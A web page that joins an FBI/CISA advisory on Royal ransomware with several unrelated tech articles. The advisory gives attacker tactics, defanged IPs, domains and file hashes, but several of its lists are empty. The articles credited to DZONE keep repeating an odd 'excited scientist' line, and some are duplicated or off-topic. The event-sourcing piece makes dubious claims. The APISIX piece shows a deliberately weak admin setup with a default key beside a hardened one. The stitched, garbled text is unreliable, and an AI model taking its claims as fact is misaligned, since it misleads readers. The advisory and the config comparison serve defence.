The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a
.onion
URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using
Chisel
, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool
PsExec
has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
vssadmin.exe
) to delete shadow copies to prevent system recovery.[1]FBI has found numerous batch (
.bat
) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
IOC
Description
.royal
Encrypted file extension
README.TXT
Ransom note
Malicious IP
Last Activity
102.157.44[.]105
November 2022
105.158.118[.]241
November 2022
105.69.155[.]85
November 2022
113.169.187[.]159
November 2022
134.35.9[.]209
November 2022
139.195.43[.]166
November 2022
139.60.161[.]213
November 2022
148.213.109[.]165
November 2022
163.182.177[.]80
November 2022
181.141.3[.]126
November 2022
181.164.194[.]228
November 2022
185.143.223[.]69
November 2022
186.64.67[.]6
November 2022
186.86.212[.]138
November 2022
190.193.180[.]228
November 2022
196.70.77[.]11
November 2022
197.11.134[.]255
November 2022
197.158.89[.]85
November 2022
197.204.247[.]7
November 2022
197.207.181[.]147
November 2022
197.207.218[.]27
November 2022
197.94.67[.]207
November 2022
23.111.114[.]52
November 2022
41.100.55[.]97
November 2022
41.107.77[.]67
November 2022
41.109.11[.]80
November 2022
41.251.121[.]35
November 2022
41.97.65[.]51
November 2022
42.189.12[.]36
November 2022
45.227.251[.]167
November 2022
5.44.42[.]20
November 2022
61.166.221[.]46
November 2022
68.83.169[.]91
November 2022
81.184.181[.]215
November 2022
82.12.196[.]197
November 2022
98.143.70[.]147
November 2022
140.82.48[.]158
December 2022
147.135.36[.]162
December 2022
147.135.11[.]223
December 2022
152.89.247[.]50
December 2022
179.43.167[.]10
December 2022
185.7.214[.]218
December 2022
193.149.176[.]157
December 2022
193.235.146[.]104
December 2022
209.141.36[.]116
December 2022
45.61.136[.]47
December 2022
45.8.158[.]104
December 2022
5.181.234[.]58
December 2022
5.188.86[.]195
December 2022
77.73.133[.]84
December 2022
89.108.65[.]136
December 2022
94.232.41[.]105
December 2022
47.87.229[.]39
January 2023
Malicious Domain
Last Observed
ciborkumari[.]xyz
October 2022
sombrat[.]com
October 2022
gororama[.]com
November 2022
softeruplive[.]com
November 2022
altocloudzone[.]live
December 2022
ciborkumari[.]xyz
December 2022
myappearinc[.]com
December 2022
parkerpublic[.]com
December 2022
pastebin.mozilla[.]org/Z54Vudf9/raw
December 2022
tumbleproperty[.]com
December 2022
myappearinc[.]com/acquire/draft/c7lh0s5jv
January 2023
Tool
SHA256
AV tamper
8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375
TCP/UDP Tunnel over HTTP (Chisel)
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
Ursnif/Gozi
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
Exfil
B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20
Remote Access (AnyDesk)
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7
PowerShell Toolkit Downloader
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
PsExec (Microsoft Sysinternals)
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c
Keep Host Unlocked (Don’t Sleep)
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
Ransomware Executable
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
Windows Command Line (NirCmd)
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5
System Management (NSudo)
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618
Batch Scripts
Filename
Hash Value
2.bat
585b05b290d241a249af93b1896a9474128da969
3.bat
41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d
4.bat
a84ed0f3c46b01d66510ccc9b1fc1e07af005c60
8.bat
c96154690f60a8e1f2271242e458029014ffe30a
kl.bat
65dc04f3f75deb3b287cca3138d9d0ec36b8bea0
gp.bat
82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58
r.bat
74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c
runanddelete.bat
342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE
MITRE ATT&CK TECHNIQUES
See table 3 for all referenced threat actor tactics and techniques included in this advisory.
Initial Access
Technique Title
ID
Use
Exploit Public Facing Application
T1190
The actors gain initial access through public-facing applications.
Phishing: Spear phishing Attachment
T1566.001
The actors gain initial access through malicious PDF attachments sent via email.
Phishing: Spearphishing Link
T1566.002
The actors gain initial access using malvertising links via emails and public-facing sites.
External Remote Services
T1133
The actors gain initial access through a variety of RMM software.
Command and Control
Technique Title
ID
Use
Ingress Tool Transfer
T1105
The actors used C2 infrastructure to download multiple tools.
Protocol Tunneling
T1572
The actors used an encrypted SSH tunnel to communicate within C2 infrastructure.
Privilege Escalation
Technique Title
ID
Use
Valid Accounts: Domain Accounts
T1078.002
The actors used encrypted files to create new admin user accounts.
Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
The actors deactivated antivirus protocols.
Domain Policy Modification: Group Policy Modification
T1484.001
The actors modified Group Policy Objects to subvert antivirus protocols.
Indicator Removal: Clear Windows Event Logs
T1070.001
The actors deleted shadow files and system and security logs after exfiltration.
Remote Desktop Protocol
T1021.001
The actors used valid accounts to move laterally through the domain controller using RDP.
Automated Collection
T1119
The actors used registry keys to auto-extract and collect files.
Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
RESOURCES
REPORTING
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
ACKNOWLEDGEMENTS
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Article source: us-cert.gov
Event Sourcing vs Database: What’s Next?
News, IT methods and process organization
Event sourcing and databases have been the go-to solutions for data storage, but what’s the next step? Let’s explore the pros and cons of each and see what the future holds.
## Understanding Event Sourcing and Its Popularity
I am an excited scientist who has made a sensational discovery about event sourcing and its potential to outgrow databases. Event sourcing is a powerful tool that is being adopted by many large organizations as their database architectural design. It has the capability to scale up and serve the needs of the modern data industry.
Event sourcing stores data in an event log, an append-only store: every change to the data is recorded as a new event in a sequence, and the current state is derived by replaying that sequence. This makes it straightforward to track how the data changed over time and to replicate the data, since the log can simply be copied to multiple servers.
The popularity of event sourcing is growing rapidly because it offers several advantages over traditional databases. It allows for faster data retrieval, since the data sits in an append-only store, and that same structure makes it easy to query and analyze data over time. It scales well, because the log can be replicated across multiple servers. Additionally, event sourcing is more secure than a traditional database in the sense that the store is append-only: existing records are never modified in place, only new events are appended.
So, is event sourcing going to outgrow databases? It is hard to say for sure, but the advantages offered by event sourcing make it a strong contender for replacing traditional databases. Event sourcing allows for faster data retrieval, better scalability, and improved security. As more organizations begin to adopt event sourcing, it is likely that it will become the preferred choice for many applications.
Article source: DZONE
Developer experience: the most important metrics
News
Discover which metrics matter most to a developer in order to improve their experience.
## Developer Experience (DevEx or DX)
Developer experience. If you provide APIs or API-focused products, you probably hear this term often. After all, you need developers for an API to succeed, and if they don’t have an excellent experience, they will move on to something else.
What is developer experience?
Developer experience (DevEx or DX) is an extension of user experience (UX) in which the focus is on the users affected by the technical side of things, for example the tools, the languages and the workflows. But DevEx goes well beyond "UX for developers": it means making sure that developers can easily understand and use an API for their own applications and use cases. Excellent DevEx happens when you communicate with your developer users, understanding and responding directly to their needs. If you can win over developers, you can build a large and thriving ecosystem around your products.
Code is the heart of developer experience. It is the most important part of DevEx, because it is what lets developers build applications that use your API. Good coding tools are essential to giving developers a consistent and pleasant experience. The tools must be easy to learn and use, and must offer intuitive features. Good coding tools can help developers quickly build robust, reliable applications that take advantage of your API.
Finally, a good developer experience requires complete and accurate documentation. The documentation must be clear and concise, and must give developers all the information they need to understand and use your API. It must also include clear examples and tutorials to help developers understand how your API works and quickly build applications that take advantage of it. Good documentation can make all the difference between a developer who understands your API and a developer who gives up.
In summary, developer experience is essential to the success of an API. To offer developers an exceptional experience, you must put the emphasis on code, provide intuitive and easy-to-use tools, and provide complete and accurate documentation. If you can offer developers an exceptional experience, you can build a large ecosystem around your product and succeed in the long term. As an enthusiastic scientist who has just made a sensational discovery, I am convinced that developer experience is the key to the success of an API.
Article source: DZONE
Microsoft Azure is a cloud computing platform and infrastructure
News
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides a range of cloud services, including compute, storage, analytics, networking, and identity management. Azure is designed to help organizations of all sizes quickly and cost-effectively develop, deploy, and manage applications and services in the cloud.
Azure offers a wide range of services that can be used to build, deploy, and manage applications and services in the cloud. These include compute, storage, analytics, networking, and identity management. Compute services provide access to virtual machines, containers, and serverless computing resources. Storage services provide access to object storage, file storage, and databases. Analytics services provide access to data analysis tools such as machine learning, data warehousing, and big data processing. Networking services provide access to virtual networks, DNS, load balancing, and traffic management. Identity management services provide access to authentication and authorization services.
Azure also provides a range of tools and services that can be used to manage applications and services in the cloud. These include Azure Resource Manager (ARM), which provides a unified way to deploy, manage, and monitor resources in the cloud; Azure Automation, which provides a way to automate tasks; and Azure Monitor, which provides a way to monitor the performance of applications and services in the cloud. Additionally, Azure provides a range of security features such as encryption, identity management, and access control. These features help ensure that applications and services are secure and compliant with industry standards.
In conclusion, Microsoft Azure is a powerful cloud computing platform and infrastructure that provides a wide range of services for building, deploying, and managing applications and services in the cloud. It offers a range of compute, storage, analytics, networking, and identity management services that can be used to quickly and cost-effectively develop, deploy, and manage applications and services in the cloud. Additionally, it provides a range of tools and services for managing applications and services in the cloud as well as a range of security features for ensuring that applications and services are secure and compliant with industry standards.
Intro to Contextual Advertising
News, IT methods and process organization
Contextual advertising is a powerful tool for businesses to reach their target audience with relevant, targeted ads. Learn how it works and its potential to drive sales!
## The Full Context: A Software Project’s Aura
I am an excited scientist who has made a sensational discovery: coding is the key to unlocking The Full Context. By coding, I mean writing code that is both readable and maintainable. It’s not just about writing code that works; it’s about writing code that is easy to understand and modify.
Coding is the foundation of The Full Context. It is the language that allows us to communicate our ideas, our intentions, and our decisions to the software. It is the bridge between the project’s stakeholders and the software itself. Without coding, there would be no way to effectively communicate the project’s requirements to the software.
Coding is also the key to unlocking the potential of The Full Context. By writing code that is both readable and maintainable, we can ensure that the project’s requirements are accurately represented in the software. We can also ensure that future changes and modifications can be made quickly and easily. This allows us to keep up with the ever-changing requirements of the project, while still maintaining a high level of quality.
The Full Context is a powerful tool that can be used to create amazing software projects. But without coding, it would remain just a concept, never fully realized. By coding, we can unlock its potential and create projects that are both powerful and maintainable. This is why coding is so important; it is the key to unlocking The Full Context and creating amazing software projects.
Article source: DZONE
MICROSOFT AZURE: Cloud platform
News
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides software as a service (SaaS), platform as a service (PaaS) and infrastructure as a service (IaaS) and supports many different programming languages, tools, and frameworks, including both Microsoft-specific and third-party software and systems.
Azure provides a comprehensive set of cloud services that enable organizations to build, deploy, and manage applications across a global network of Microsoft-managed data centers. It offers a wide range of services, including virtual machines, storage, databases, networking, analytics, and more. It also provides tools for developing and managing applications, such as Visual Studio, Azure DevOps, and Azure Machine Learning.
Azure enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of services for managing and monitoring applications and services, including Azure Monitor, Azure Security Center, and Azure Automation. Additionally, it offers advanced analytics capabilities with Azure Machine Learning and Azure Cognitive Services.
In addition to providing cloud services, Azure also offers a range of tools for developing and managing applications. It provides a range of development tools such as Visual Studio Code, Visual Studio Team Services, and Azure DevOps. It also provides a range of services for managing applications such as Azure Resource Manager, Azure Automation, and Azure Monitor. Additionally, it provides a range of services for monitoring applications such as Azure Application Insights and Azure Security Center.
Azure also provides a range of services for storing data in the cloud. It offers a range of storage services such as Azure Blob Storage, Azure Files, Azure Queue Storage, and Azure Table Storage. It also provides a range of database services such as Azure SQL Database and Azure Cosmos DB. Additionally, it provides a range of services for managing data such as Azure Data Factory and Azure Data Lake.
Overall, Microsoft Azure is an incredibly powerful cloud computing platform that enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of tools for developing and managing applications as well as services for storing data in the cloud. With its comprehensive set of cloud services and tools, Microsoft Azure is an essential platform for any organization looking to take advantage of the power of the cloud.
Secure Admin Access to Apache APISIX
News, IT methods and process organization
Secure your APIs with Apache APISIX, the open source, high-performance API gateway that provides secure admin access.
## Securing Your Apache APISIX Admin Access
I am an excited scientist who has made a sensational discovery: data security can be improved by protecting your Apache APISIX admin access. This is a critical component of your infrastructure, as it is responsible for routing traffic to the right places. If an attacker were to gain access to this, they could potentially redirect traffic to their own infrastructure, leading to data theft or financial losses.
To ensure the security of your data, it is essential to protect your Apache APISIX admin access. Here are a few ways to do this:
First, enable authentication for the admin API. This requires users to enter a username and password before they can access the API, and you can add two-factor authentication for additional security. Additionally, limit the IP addresses that are allowed to reach the admin API, so that only trusted addresses can access it and unauthorized access is blocked at the network level.
Second, use TLS encryption for all communication with the admin API, so that all data is encrypted in transit and protected from interception. Pair it with a strong cipher suite so that the data is encrypted with a strong algorithm.
Finally, monitor all activity on the admin API, so that suspicious activity is detected and acted on quickly. Enable logging of every request to and response from the admin API, so that suspicious activity can be reviewed after the fact and action taken if necessary.
In conclusion, protecting your Apache APISIX admin access is essential for ensuring the security of your data. By following the steps outlined above, you can ensure that your data is safe and secure. With these measures in place, you can rest assured that your data is protected from unauthorized access and theft.
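As an added example (not from the article), the points above expressed as two Apache APISIX 3.x config.yaml fragments: a weak Admin API configuration and its hardened equivalent. APISIX authenticates Admin API calls with an API key sent in the X-API-KEY header rather than a username and password; the key paths are taken from the upstream config-default.yaml, and the certificate paths, bind address and 10.0.5.0/24 management subnet are placeholders for your own environment.

```yaml
# Added example, not the article's or the APISIX project's own file.
# Document 1: a weak Admin API setup; document 2: the hardened equivalent.
# Cert paths, the 10.0.5.10 bind address and the 10.0.5.0/24 subnet are placeholders.

# --- 1. weak: published default key, open allow-list, plaintext admin API ---
deployment:
  role: traditional
  role_traditional:
    config_provider: etcd
  admin:
    enable_admin: true
    admin_key:
      - name: admin
        key: edd1c9f034335f136f87ad84b625c8f1   # the default shipped in config-default.yaml
        role: admin
    allow_admin:
      - 0.0.0.0/0                               # any source that can reach port 9180
    admin_listen:
      ip: 0.0.0.0                               # listens on every interface
      port: 9180
    https_admin: false                          # the key crosses the network in clear text

---
# --- 2. hardened ---
deployment:
  role: traditional
  role_traditional:
    config_provider: etcd
  admin:
    enable_admin: true
    admin_key_required: true                    # never run the Admin API without a key
    admin_key:
      - name: admin
        key: ${{APISIX_ADMIN_KEY}}              # long random value injected from the environment
        role: admin
      - name: viewer
        key: ${{APISIX_VIEWER_KEY}}
        role: viewer                            # read-only role for monitoring tooling
    allow_admin:
      - 127.0.0.0/24
      - 10.0.5.0/24                             # placeholder: management subnet only
    admin_listen:
      ip: 10.0.5.10                             # placeholder: bind to the management interface
      port: 9180
    https_admin: true                           # TLS for every Admin API call
    admin_ssl_cert: /etc/apisix/certs/admin.crt       # placeholder paths
    admin_ssl_cert_key: /etc/apisix/certs/admin.key
    admin_ssl_ca_cert: /etc/apisix/certs/ca.crt
    admin_api_mutual_tls: true                  # client certificate as a second factor

nginx_config:
  http:
    enable_access_log: true                     # every Admin API request is recorded
    access_log: logs/access.log
```

After applying the hardened fragment, a request to port 9180 without a valid X-API-KEY header, from outside the allow-list, or over plain HTTP should be rejected; check that the rejection shows up in the access log.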
Article source: DZONE